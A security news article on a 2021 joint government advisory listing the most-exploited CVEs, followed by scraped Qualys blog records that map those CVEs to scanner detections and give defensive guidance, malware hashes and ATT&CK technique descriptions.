[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)
Intelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.
"Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations worldwide," the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).
"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system."
The top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.
The most routinely exploited flaws in 2020 are as follows -
* [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability
* [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability
* [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak
* [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability
* [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability
* [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability
* [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability
* [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability
* [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability
* [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability
* [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution
* [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability
* [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability
* [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability
The list of vulnerabilities that have come under active attack thus far in 2021 are listed below -
* [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka "ProxyLogon")
* [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)
* [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)
* [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)
* Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)
The development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 "most dangerous" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.
"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices," NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.
Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"qualysblog": [{"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. 